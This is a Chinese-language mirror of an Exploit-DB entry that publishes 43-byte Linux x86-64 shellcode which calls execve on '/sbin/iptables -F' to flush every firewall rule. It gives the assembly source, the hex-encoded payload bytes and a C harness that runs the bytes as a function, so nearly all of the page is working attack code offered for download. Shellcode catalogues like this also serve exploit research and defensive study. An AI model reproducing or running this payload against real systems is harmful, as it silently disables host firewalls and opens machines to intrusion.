漏洞概要

漏洞标题:
Linux/x86-64 – execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) Shellcode (43 bytes)

提交时间:
2018-01-13

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 13 人关注

漏洞详情

EDB-ID: 43553 Author: 0x4ndr3 Published: 2018-01-13
CVE: N/A Type: Shellcode Platform: Linux_x86-64
Aliases:
N/A
Advisory/Source: Link Tags:
N/A

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Shellcode:

Download Shellcode Code Download

/

View Raw

Shellcode Size: 43 bytes
/*
section .text
    global _start
     
_start:
    push 0x3b
    pop rax
    cdq
    push    rdx
    push    word 0x462d
    push    rsp
    pop     rcx
    
    push    rdx 
    mov     rbx, 0x73656c6261747069
    push    rbx
    mov     rbx, 0x2f2f2f6e6962732f
    push    rbx
    push    rsp
    pop     rdi
     
    push    rdx
    push    rcx
    push    rdi
    push    rsp
    pop     rsi
     
    ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL);
    syscall
*/

#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x3b\x58\x99\x52\x66\x68\x2d\x46\x54\x59\x52\x48\xbb\x69\x70\x74\x61\x62\x6c\x65\x73\x53\x48\xbb\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x53\x54\x5f\x52\x51\x57\x54\x5e\x0f\x05";
void main()
{
	printf("Shellcode Length:  %lu\n", strlen(code));
	int (*ret)() = (int(*)())code;
	ret();
}

发表评论

电子邮件地址不会被公开。 必填项已用*标注